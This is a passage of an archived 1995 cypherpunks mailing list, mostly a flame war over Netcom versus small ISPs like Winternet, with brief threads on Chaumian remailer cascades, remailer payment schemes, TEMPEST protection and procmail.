cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3l5yoZzwIn1bdtAQHYmwGAmV97gzR8Tcl4b5iWMtRSbxUGKGFjEErS
CNbc4fIyVrRnpUg55T8PSB9RktUn/I5K
=OK63
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: I'm Wozz <wozzeck@phantom.com>
Date: Fri, 6 Jan 95 17:08:34 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Files and mail
In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com>
Message-ID: <Pine.3.89.9501061945.A12905-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Mike Duvos wrote:

> drechsau@winternet.com (Mike Horwath) carefully explains all the
> reasons why is it better to have a Netcom account than a
> Winternet account!
> 
>  > I was going to be in, I decided to rest instead.  So sue me
>  > for it.
> 
> Big providers like Netcom have many employees and many machines.
> Things do not screech to a halt when "the guy who owns the
> machine" takes a mental health day. :)
> 

no instead things screech to a halt when the 1000th user gets on each 
client machine


>  > Talk about net.good.will...you stole service after it was
>  > suspended.
> 
> Free service offered to the public cannot be stolen, even by
> prior dissatisfied customers.  Big providers like Netcom don't
> care if someone they don't like logs onto the machine again as
> "guest".
> 

when she was prohibited from that service because of her actions it is.


>  > Tuesday, after being up for 20+ hours and getting a couple
>  > hours sleep, you call ... Again, sue me, this time for being
>  > tired.
> 
> Service at big providers like Netcom doesn't slack off when "the
> guy who owns the machine" misses his nap...
> 

no they slack off whenever they get a chance


>  > Wednesday, I was going to be into work, which you assumed I
>  > would be, ... I decided I was going to take that day off ...
> 
> ...or when "the guy who owns the machine" goes fishing...
> 

...or when 5 trillion hackers descend on the machine and eat it alive


>  > The machine being down was not used as an excuse, but it is
>  > hard to operate like we used to with only one user machine.
> 
> ...or when "the machine" is broken.
> 

...or when "their network" is broken.


>  > That is 2 counts in 2 days (notified on monday, early, of
>  > the spamming, notified on wed of the mass unsolicited
>  > mailings).  Sorry, someone had to put their foot down, and
>  > it happened to be us.
> 
> Big service providers like Netcom don't interfere with customer
> use of the resources they sell, except when network functionality
> is impacted.  Even in such cases, they try to reach an
> understanding with the user, and terminate accounts only as a
> last resort.  Accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.
> 

if a user on netcom violates the AUP, their account would be 
terminated...if those were the terms of the AUP.

It just so happens the AUP of winternet allows for this situation.

its a bit far fetched to call HIS reaction a tantrum.... If anyone's 
screaming for mommy its whats-her-name....



>  > Sorry Carol Anne, but this is a system I administer and I
>  > use the AUP to protect all of us accross the 'net.
> 
> I am sure we will all sleep more soundly knowing that Mike
> Horwath and his tiny pimple of a machine on the Internet are
> "protecting" us.

big is better i guess....

> 
>  > We had talked about the winternet t-shirts and how we would
>  > use the work you did and the monies you would receive as
>  > payment.
> 
> Big providers like Netcom don't make silly little deals with
> customers for T-shirts...
> 

Big providers like Netcom don't have a 'community' to speak of.


>  > Well, no t-shirts have gone out and at this time, I will be
>  > cancelling all orders for them and will redesign them and
>  > have them produced externally to what you have done.  This
>  > is what happens when you hold something over someones head.
> 
> ...or cancel those agreements out of spite when they don't get
> everything done their way.


uhmm, sounds like the deal was cancelled because she didn't 
deliver.,..not out of spite

> 
> You know, I used to use BBS systems a great deal before large
> providers like Netcom began offering personal accounts with
> Internet access at reasonable rates.  A BBS is about as far from
> a common carrier as one can get, and many Sysops disclaim all
> your rights under the ECPA, read private mail, forbid the use of
> PGP, decide what opinions may be expressed on various issues, and
> boot off any user who questions anything they do.  Since the
> Sysop owns the machine, they are legally within their rights to
> act like this, and as long as there are enough users who will put
> up with their behavior, they can run a system.


HAhahaha...if you had any idea what you were talking about, you would 
realize you are totally off base.

Winternet is HARDLY a 'bbs'.  Its a regional internet service....much as 
netcom was before they flooded every city with dialups.

Any professional knows better than to read private mail...and if this is 
so...then they aren't worthy of having a site to run

as for PGP, this is an individual thing....I'm sure mike has no such 
objections...i know here at MindVox we don't...in fact, we installed it 
for the users

Who owns netcom's machines?


> 
> Now that Unix boxes are not much more expensive than PCs used to
> be, every asshole in the world who played Sysop on a BBS now
> envisions himself as Sysadmin of an ISP.  So you have an
> infestation of tiny service providers, running on toy machines,
> that coast along for a few years until the person running them
> either goes bankrupt or gets bored.  I certainly wouldn't
> subscribe to one of these services, because the management
> mentality and problematical service most of them provide is
> exactly what I came to Netcom to get away from.
> 

Once again, you speaketh from your ass....

Netcom is an abomination.....it is the only one of its kind (not counting 
delphi etc, since they were conceived under differnent systems)

Netcom is a Winternet which has grown out of control.

They suck network services off others (irc as one example) and don't take 
responsibilty for the HUGE number of idiots on their service who 
maliciously hack anything they can reach....its totally without 
personality...AND....its slower than molasses...the management is out of 
touch with the users and they are so overloaded with trouble reports, 
they don't know what to do with them.


> Quite frankly, I don't see why Carol doesn't just get a Netcom
> account and stop quibbling with this twit.  Stop letting him
> waste any more of your time and let him play his administrative
> power games with newbies who don't know any better.

Yes....join them carol

join them....
join them....
join them....

be like us....
be like us....
be like us....

we will care for your every need....
we will care for your every need....
we will care for your every need....

look deep into my eyes....
look deep into my eyes....
look deep into my eyes....


This has got to be one of the largest loads of crap I've seen tossed on 
this list in the year and a half i've lurked on it.

I'd love to see a response to this...please!

oh...btw...i don't have ANY connection to winternet, other than knowing 
MANY satisfied customers, and having heard alot about them, as a sysadmin 
for a site in much the same situation.

       ,       /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
   .       .  <((_))  MindVox  ((_))>  phantom access technologies inc
      .        \- \/(:::::::::)\- \/   wozzeck@phantom.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Fri, 6 Jan 95 20:26:55 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Too Much!
Message-ID: <Pine.NXT.3.91.950106202333.12708A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain



  Yet again I have un-subbed from the list because of the S/N ratio. And 
things were looking so good there for a while.

  Advice to Carol Ann: Take your crusade to e-mail.

    Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:28:32 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
In-Reply-To: <Pine.3.89.9501061816.A25172-0100000@netcom10>
Message-ID: <199501070428.UAA21189@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "James A. Donald" <jamesd@netcom.com>

   On Fri, 6 Jan 1995, Eric Hughes wrote:
   > This whole fracas between blind-sig money and FV money is a symptom of
   > the confusion between clearing and settlement.

   It is nothing to do with that confusion.

Keep your day job.

   > To wit, a remailer consortium would do best to issue a local banknote
   > usable only by themselves and have customers settle with the
   > consortium issuer, rather than any member of the consortium itself.
   > If the consortium issuer were to use blind sigs, the consortium
   > members wouldn't be able to ascertain who paid.

Get it?  The first sentence refers to a "local banknote".  The second
sentence refers to a particular way of issuing that banknote.  Passage
from the general to the specific.

   The problem that we are discussing is how to solve them 
   without using Chaumian money.

Think about how a local clearing organization allows this.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:33:00 PST
To: cypherpunks@toad.com
Subject: Re: A Fire Upon the Deep
In-Reply-To: <Pine.SUN.3.91.950106190639.16522B-100000@eskimo.com>
Message-ID: <199501070432.UAA21211@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Wei Dai <weidai@eskimo.com>

   This is quite sensible given that in the Zone universe, you may have no
   idea how much computing power your enemies have, so no cryptography
   that is only computationally secure can really be trusted.

I asked Vernor about this one a few months ago.  He got lucky on this
one.  He thought that some advances in theory might render the whole
idea ridiculous.  It was not the case that he was considering relative
computational power, which works much better in context, especially
given the hints of some computational power beyond Turing machines.

A great one-liner about debating public-key, in any case.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Jan 95 20:32:28 PST
To: cypherpunks@toad.com
Subject: Re:  Can someone verify this conjecture for me?
Message-ID: <199501070433.UAA16429@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: nelson@crynwr.com (Russell Nelson)
> 
> I'd like to make sure I understand how a digital mix works.  I've read
> Chaum's paper on it, but hey, there's a reason why I don't have a Phd
> in spite of having all the coursework done.
> 
> It seems like it solves two separate problems: 1) foiling traffic
> analysis, and 2) foiling a cheater remailer.  The problems are
> separate, really, because if you really, really trust the remailer (as
> many people do Julf), then 2) isn't a problem.  All you need to do is
> solve 1.  Or, you can solve 1) by using a single remailer.  A
> necessary but not sufficient step to foil traffic analysis is to strip
> headers.

My take on the paper is that he first presents the "mix", or remailer, as
a method of foiling traffic analysis.  Then he extends this to the
"cascade", or chain of remailers, which does not improve traffic analysis
resistence but as you say provides some immunity against a bad operator.

> If you trust any one remailer, then you needn't bother using any other
> ones (assuming that remailer has enough traffic, delay, mixing, etc to
> foil traffic analysis).  There's no real difference between using a
> set (N>1) of trusted remailers and using only one, because you can
> consider the set of remailers to be a single remailer from the point
> of view of traffic analysis.

There are other differences which may be relevant in practice.  One is
bandwidth.  With a Chaumian cascade of N remailers you get N times the
bandwidth used, as well as increased latency through the remailer
network.

One thing that is not often appreciated in Chaum's paper is that at least
in his first description of the cascade, the assumption is that all users
use the same sequence of remailers in the same order.  We OTOH usually assume
a different model, where the different possible paths are chosen with
some distribution and randomness.  I posted an analysis of some of the
impacts of this difference a few months ago.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLw4ZXhnMLJtOy9MBAQGjtwIA7tlEMnKPqUAVqAMSmK6EE6eaOlzhqeLL
hsHXhNJajyZQjF6osybGSYJ00UBhRkbAxUOtjY4MNf6oMrb9fKRxGg==
=A3oZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 6 Jan 95 20:48:40 PST
To: pcassidy@world.std.com (Peter F Cassidy)
Subject: Re: Peter D. Lewis
In-Reply-To: <Pine.3.89.9501062325.B10171-0100000@world.std.com>
Message-ID: <199501070448.UAA05731@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter F Cassidy wrote:
> 
> wired has balls. the economist has to figure out what all this stuff 
> means in the real world. wired just sells ads around the events it 
> covers. lewis is innocent compared to wanton scum like kelly. 

Maybe I'm biased, but I have a lot of respect for Kevin Kelly. I met
him at the first "Artificial Life" conference, at Los Alamos, 1987,
and he drove down here to Santa Cruz to interview me for several hours
for his not-yet-published "Wired." (As it turned out, Steven Levy also
interviewed some of us and Kelly chose to run Levy's article in the #2
isuusue of "Wired," instead of his own, and submitted his own article
to "Whole Earth Review," where it ran in the Summer 1993 issue.

I've found Kelly to be somewhat quiet, and deep, and not all
flamboyant and grubbing after soundbite quotes.

His book "Out of Control," 1994, is the beast summary I've seen of the
swirl of concepts we are generally interested in.

So, what's your problem with Kelly? If it's the profit motive  of
"Wired," we disagree, as I think profits are great. If it's the
ad-laden pages of "Wired," well, that's life in the high-tech age of
cheap color printing, zillions of Macintoshes, and a culture that
loves high-tech glitz.

I think Kelly is a person of high integrity. It's hard to demand much
more than this.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:50:56 PST
To: nesta@nesta.pr.mcs.net
Subject: Re: procnail
In-Reply-To: <Pine.3.89.9501062210.A7984-0100000@nesta.pr.mcs.net>
Message-ID: <199501070450.UAA21282@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Fri, 6 Jan 95 19:32:02 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: A Fire Upon the Deep
In-Reply-To: <Pine.SUN.3.91.950106190639.16522B-100000@eskimo.com>
Message-ID: <Pine.3.89.9501062110.C6731-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Wei Dai wrote:

> In article <199501052231.OAA11745@netcom5.netcom.com>, tcmay@netcom.com 
>  
> There was some recent talk about network agent technology on this list.
> Vinge mentions almost in passing how an entire planet (or maybe planets)
> was taken over by an "intelligent net packet".  Makes me rather nervous
> about things like Magic Cap...
>
does anynoe have any information about intelligent agents?  I mean I know 
about filter and stuff, but they arent intelligent agents.  I assume one 
would be something like the WWW worm and other searching scripts that 
have a database of information to cross-reference their finds and decide 
what to send back to you.  the WWWWorm is a good centralized illustration 
of this, with a searchable index of HTML pages.  Or is there osmethign 
else that makes upa  "intelligent agent"
  
> One more thing that's marginally related to cypherpunks (hey I really
> like this book so I'll take any chance I can to talk about it ;-) is
> the idea that the efficiency of distributed computation (and distributed 
> intelligence) depends on high bandwidth and low latency of the communication
> medium.  Since anonymity seems to have rather high costs in terms of
> bandwidth and latency (compare anonymous e-mail with internet video
> conferencing or even with normal e-mail), this implies that
> an organization of anonymous agents will not work as efficiently as
> a similar orginzation whose members are not concerned about
> anonymity.

i disagree storngly.  anonimity with almost no increase in latency or 
decrease in bandwidth is easily viable.  Especially if it was a group of 
coleagues planning to get together, I mean the remailers and stuff are a 
different thing altogehter, but ytalk or another confrencing system with 
untracable features is no problem, hell just a conference call dialing up 
from payphones, ora favorite hacker trick of running a conference of a 
COCOT.  etc....

i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek.Zeanah@f903.n102.z1.fidonet.org (Derek Zeanah)
Date: Sat, 7 Jan 95 00:52:00 PST
To: cypherpunks@toad.com
Subject: TEMPEST Questions...
Message-ID: <121_9501062145@borderlin.quake.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I'm writing an article on TEMPEST technology.

The focus is on what TEMPEST is and how to defeat it, if possible.  So far
I've gotten some insightful information, but I'm looking for all I can get.

Has anyone ever heard of TEMPEST being used in the continental US?  Can anyone
tell me what measures offer some level of protection, or steps that can be
taken to reduce the likelihood of being successfully targeted?  Has anyone
ever seen TEMPEST in action?

Any and all information will be greatly appreciated.

I prefer responses via e-mail to dzeanah@holonet, but I also read this
newsgroup pretty frequently.

Thanks a lot.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi34pIYAAAEEALUNlIECc/SWho25DYEMwSAB0pEZsVro086ocA1eFmqfPUdb
Mziw9z4lclX0DCznLzcYXzRBHQXYHclcSsPCn6lXYugmPdT8t5OkoqzN8mdU1iuH
/YQZ79q1Iv+kufa0A8ZJn+9R/QmQnbxiOPJPOJzHYivd/hui70wIwf2qjF2hAAUR
tCVEZXJlayBTLiBaZWFuYWggPGR6ZWFuYWhAaG9sb25ldC5uZXQ+iQCVAwUQLw3z
i0wIwf2qjF2hAQGvawP/RSkJ0YSZX0MpeBMjo2BS9Qbsxs9iIS7/J1UesbNmR4ST
686EwPcpIMjiERJ425gXthOC7Jb7+39epkJkgoeuQqzj5FpnklpaGgG/2oyNbMKt
EdysgkcufQm7lYMx4r/EOdW/PvLPL7cFBkCbdYRxOGmhy+iLnYrVRLqVNLteluI=
=VD2n
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw4n/EwIwf2qjF2hAQGcuQP/UtKXz0w3icEf3j094LpkOmr7t+miBcT4
9T0rsZ8UNz/Md7l4iY0sA929vU5IiZs58dTH0qiIVrFLf5qh0hzV+7edX6ARxccP
ZSsdchd6g6LdRJn+s4QvOQT19TgcAGfW1p0lbVvDKGsh2+KmpQ4jHiLC3ugYq2x3
nqL4aY8dC4c=
=L/Fy
-----END PGP SIGNATURE-----



~~~ PGPBLUE 3.0 <NR>

... I don't see my signature anywhere on this "social contract"
--
| Fidonet:  Derek Zeanah 1:102/903
| Internet: Derek.Zeanah@f903.n102.z1.fidonet.org
| via Borderline! uucp<->Fido{ftn}gate Project +1-818-893-1899





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Fri, 6 Jan 95 20:41:56 PST
To: cypherpunks@toad.com
Subject: Remailers, Linux, & Help ...
Message-ID: <199501070337.VAA00697@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi all,

Normaly I use(d) 'ravage@bga.com' to access this list but the times they are a
changin' ...

I have successfuly gotten my network at home on Internet via a ISDN link. We
are interested in setting up a remailer which among other things supports
anonymity. If anybody has experience or learned input on doing this under 
Linux please contact me. 


A reminder that RoboFest 6 in Austin, TX will occur this year on April 1 & 2.
If there are any c-punks interested in giving a talk or doing demo's then 
please contact me. If any of you folks are in the area then stop by and say
Hi. I will be working at the Wired Society booth.

Take care!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 21:57:33 PST
To: cypherpunks@toad.com
Subject: Re: Netcom is not a good example (Was: Re: Files and mail)
In-Reply-To: <Pine.SUN.3.91.950107000218.29538D-100000@unix2.netaxs.com>
Message-ID: <199501070557.VAA12227@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Handler <grendel@netaxs.com> writes:

 > Yeah. They only kill accounts when people criticize
 > NetCruiser. :-P

 > Netcom is hardly an example of a quality service provider.
 > They suffer periodic long term news and email delays; their
 > service personnel are rude, slow, and unprofessional (read:
 > Bruce Woodcock & the above incident);

NetCruiser is a "work in progress" and continues to evolve in the
right direction.  Bruce Sterling Woodcock is history.  On the
rare occasions when I have interacted with support@netcom.com,
their responses have been both helpful and provided in a timely
fashion.

 > Their security has been compromised countless times

This is Unix.  Not a problem exclusive to Netcom.

 > They are home to some of the most infamous net.kooks and
 > net.cretins (like Tom Servo, currently), ...

I suppose I should be pleased that you have not included me by
name in the list. :)

 > Frankly, I'd rather have a Winternet account than a Netcom
 > account.

Fine with me.  As long as *I* don't have to have a Winternet
account.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: I'm Wozz <wozzeck@phantom.com>
Date: Fri, 6 Jan 95 19:07:38 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Files and mail
In-Reply-To: <Pine.3.89.9501061827.A22477-0100000@netcom10>
Message-ID: <Pine.3.89.9501062211.A16409-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, James A. Donald wrote:

> On Fri, 6 Jan 1995, I'm Wozz wrote:
> > > 
> > > Big providers like Netcom have many employees and many machines.
> > > Things do not screech to a halt when "the guy who owns the
> > > machine" takes a mental health day. :)
> > > 
> > 
> > no instead things screech to a halt when the 1000th user gets on each 
> > client machine
> 
> When Netcom slows down, this is not because the asshole in charge
> is being an asshole.

I'd hardly call taking a day off being an asshole.  Is he supposed to 
staff the thing 24 hours a day 7 days a week?

No...its a small operation, that cannot be expected.


> 
> He may well be an asshole, but the size of netcom protects
> me from having to discover this.
> 

and you like the fact that you have NO idea who's running the place.

> This is good for my mental health.  
> 
> > 
> > I'd love to see a response to this...please!
> 
> You are totally full of shit.

and why is this?  there is no support for this statement...


> 
> Mike Horwath was arrogant and unprofessional.  
> 

hardly...after the fit this woman threw.  CC'ing his private mail and 
interactions with her to COMPLETELY unrelated places .... such as

cypherpunks, nicholas negreponte of all people, wired, etc, etc, etc

as i understand the situation, the main contention here is that she was 
trying to sell space on her web pages.....on winternet's 
machines....without winternet's permission.

How would netcom react to such a situation (oh thats right....you're not 
allowed to have web pages)

How about a similar situation, such as you selling the time you don't use 
on your account to a friend and pocketing the money


> The problems you describe with Netcoms service are entirely
> accurate.  I am looking for better solution. Submitting to 
> the authority of an arrogant and incompetent fool does not
> seem like a good solution.
> 

no...instead, submit to the authority of 100 or so ANONYMOUS arrogant 
incompetent fools


> He is plainly a fool, because if I had acted as he has acted,
> I would certainly not post this all over the place.
> 

he's not posting this all over the place....Carol had a fit and he chose 
to respond.  I'm afraid the baby here is Carol


  ,    +      .        /\_-\ ==================----------------------
    .      `    .     <((_))> ==============--------------------
`        x    .        \- \/ ===========------------------
       ,       /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
   .       .  <((_))  MindVox  ((_))>  phantom access technologies inc
      .        \- \/(:::::::::)\- \/   wozzeck@phantom.com
  +      `             /\_-\ ===========------------------
   .   ,   *    '     <((_))> ==============--------------------
+             x        \- \/ ==================----------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: I'm Wozz <wozzeck@phantom.com>
Date: Fri, 6 Jan 95 19:20:46 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Files and mail
In-Reply-To: <199501070212.SAA19162@netcom3.netcom.com>
Message-ID: <Pine.3.89.9501062250.B16409-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Mike Duvos wrote:

> "I'm Wozz" <wozzeck@phantom.com> writes:
> 
> [miscellaneous Netcom-honking elided]
> 
>  > It just so happens the AUP of winternet allows for this
>  > situation.
> 
> Right.  And a small service provider can make any "terms of
> service agreement" his or her little heart desires.  Just like
> the owner of a two line BBS.  With big service providers, such
> things tend to be done in a somewhat more business-like fashion.


hahah....netcom can make up anything they want to.

You do of course, read these agreements before you get on...don't you...

Here's a simple solution...don't get on a systems who's AUP you disagree 
with.

You assertion that simply because a company is not netcom's size, that 
its unprofessional and incompetent is rediculous.

> 
>  > its a bit far fetched to call HIS reaction a tantrum.... If
>  > anyone's screaming for mommy its whats-her-name....
> 
> Well, if I posted a message to 10 newsgroups and some bozo posted
> a message to a.c-e.n-a falsely implying that it was the beginning
> of some sort of massive spam, I would certainly not be pleased.
> If Netcom, after receiving some small amount of flamage on the
> subject, summarily removed access to my account and made
> themselves unavailable for several days when I tried to contact
> them to discuss the matter, and then tossed me off with a
> flippant "so sue me" when I protested, I would be even less
> pleased.  Fortunately, I can't imagine Netcom even caring about a
> 10 newsgroup cross-post.
> 

right....because Netcom is FILLED with assholes....those that crosspost 
to 10 groups are overlooked


>  > big is better i guess....
> 
> In the case of Internet Service Providers, big is definitely
> better.  There are simply economies of scale which are not
> realized with smaller operations.  Netcom has had some problems,
> but almost all of them were growth related.  None of them were
> intrinsic to the systems and network itself.
> 


so...AOL is better than netcom?

at least they have an irc server.

and ALL of netcom's problems are related to the systems and network....

they didn't plan their expansion correctly....and as a result...are 
feeling it now.

>  > Winternet is HARDLY a 'bbs'.  Its a regional internet
>  > service....much as netcom was before they flooded every
>  > city with dialups.
> 
> Read again, this time for comprehension.  I did not say Winternet
> was a BBS.  Merely that smaller ISPs have many of the undesirable
> characteristics found in BBS systems.
> 

and Netcom has many of the undesirable characteristics found in big 
systems like Prodigy and Compuserve...

if you honestly find this attractive.....well, enjoy


>  > Any professional knows better than to read private
>  > mail...and if this is so...then they aren't worthy of having
>  > a site to run
> 
> For legal purposes, most BBS systems declare that for the
> purposes of the ECPA, there is no such thing as private mail on
> their system.  The Sysop is then free to read anything he wishes
> to.  This policy is clearly stated in the user agreements of
> almost all BBS systems offering access to the public.
> 

well of course.....Netcom will read your mail too if you are accused of 
hacking.  The fact is....the chances of someone reading your mail on 
Netcom are about 100 times higher than on a smaller system....simply 
becuase the place is so overridden with root wielding hackers who have 
nothing better to do than torment others....

>  > as for PGP, this is an individual thing....I'm sure mike
>  > has no such objections...i know here at MindVox we
>  > don't...in fact, we installed it for the users
> 
> Many BBS Sysops forbid PGP and kick users off their systems who
> use it.  They cite fears of encrypted illegal porn and credit
> card numbers passing through their systems, and potential legal
> liability.
> 

well......once again.....shop before you buy.  You can't make such 
blanket assertations, because they simply aren't true. 


>  > Netcom is an abomination.....it is the only one of its kind
>  > (not counting delphi etc, since they were conceived under
>  > differnent systems)
> 
> Netcom is the fastest growing and leading Internet Service
> Provider.  Their ability to attract new customers is limited only
> by the rate at which they are able to increase capacity.  Their
> respect for freedom of expression is absolute and they do not
> meddle in their customers' affairs.  Their prices are reasonable
> and their user agreement is fair.  Works for me. :)
> 


Netcom is also the LEADING source of trouble for the rest of the network 
because of the way they handle their user population.  They can't keep up 
with all their problems.  This seems to translate to you as - "They 
respect me and don't bother me"  THe fact is....they don't even know who 
the hell you are.  And....being a matter of scale, as several pointed out...

netcom is about 100 times the size of winternet....(approximation)...

thus...lets multiply everything by 100, profits, users, problems, etc, etc

If one of their user's posted (10x100) 1000 MAKE.MONEY.FAST posts to 1000 
different groups.....you can bet that person wouldn't have their account 
the next day.

>  > They suck network services off others (irc as one example)
>  > and don't take responsibilty for the HUGE number of idiots
>  > on their service who maliciously hack anything they can
>  > reach....its totally without personality...AND....its slower
>  > than molasses...the management is out of touch with the
>  > users and they are so overloaded with trouble reports, they
>  > don't know what to do with them.
> 
> Perhaps an exaggerated description of Netcom a few months ago,
> but certainly not the current state of affairs.  I always get a
> line when I dial in, response time is reasonable, disk is
> abundant, and almost all software is available.  Speed of network
> connections to other sites is quite acceptable.
> 

this is THEIR network.....

there is ANOTHER network out there....its called...the Internet.

I've had MANY users at my site connecting from netcom, and insisting that 
our T1 is overloaded because of the chunky responses they are getting...

well, guess what.  As soon as they tried from somewhere else....their 
problems dissapeared.

They contribute very little to the Internet .... and that which they do 
is overshadowed by the harm many of their more immature users cause

> 
>  > oh...btw...i don't have ANY connection to winternet, other
>  > than knowing MANY satisfied customers, and having heard
>  > alot about them, as a sysadmin for a site in much the same
>  > situation.
> 
> The number of satisfied customers is not the measure of a site,
> any more than the number of people still alive is the measure of
> a disease.

its not?  then your opinion doesn't count...right?
i mean...you're just a satisfied user

> 
> Netcom works with the reliability of the phone company.  It is
> always there, almost always up, and is redundant enough that when
> something breaks, it is still usable.  I pay my $19.50 a month
> and I get unlimited everything.  I'm happy.
> 

If you call netcom usable...you've obviously NEVER tried another ISP...or 
had several VERY bad experiences with the few you've tried.  I urge you 
to give the whole situation another look.


  ,    +      .        /\_-\ ==================----------------------
    .      `    .     <((_))> ==============--------------------
`        x    .        \- \/ ===========------------------
       ,       /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
   .       .  <((_))  MindVox  ((_))>  phantom access technologies inc
      .        \- \/(:::::::::)\- \/   wozzeck@phantom.com
  +      `             /\_-\ ===========------------------
   .   ,   *    '     <((_))> ==============--------------------
+             x        \- \/ ==================----------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: I'm Wozz <wozzeck@phantom.com>
Date: Fri, 6 Jan 95 19:22:52 PST
To: cypherpunks@toad.com
Subject: re: Netcom
Message-ID: <Pine.3.89.9501062250.C16409-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain



Oh yes....and how can we forget...

for all its superiority....it seems to have dropped SLIP/PPP because that 
made them have to deal with the customers too much.

Makes you feel all loved eh?

  ,    +      .        /\_-\ ==================----------------------
    .      `    .     <((_))> ==============--------------------
`        x    .        \- \/ ===========------------------
       ,       /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
   .       .  <((_))  MindVox  ((_))>  phantom access technologies inc
      .        \- \/(:::::::::)\- \/   wozzeck@phantom.com
  +      `             /\_-\ ===========------------------
   .   ,   *    '     <((_))> ==============--------------------
+             x        \- \/ ==================----------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Fri, 6 Jan 95 22:28:11 PST
To: "L. Todd Masco" <cypherpunks@toad.com
Subject: Re: Too Much!
Message-ID: <Chameleon.4.01.950106222823.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


>You might want to try reading it from NNTP, via c2.org or hks.net.  You
>can then use Kill files.

What is the group name?

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Fri, 6 Jan 95 20:38:48 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: procnail
Message-ID: <Pine.3.89.9501062210.A7984-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


in response to the recent barrage of nonsensical bullshit here, I was 
wondering if anyone knew the archive site or procmail, the mail filtering 
program? I think this is a good time to school everyone in the basics of 
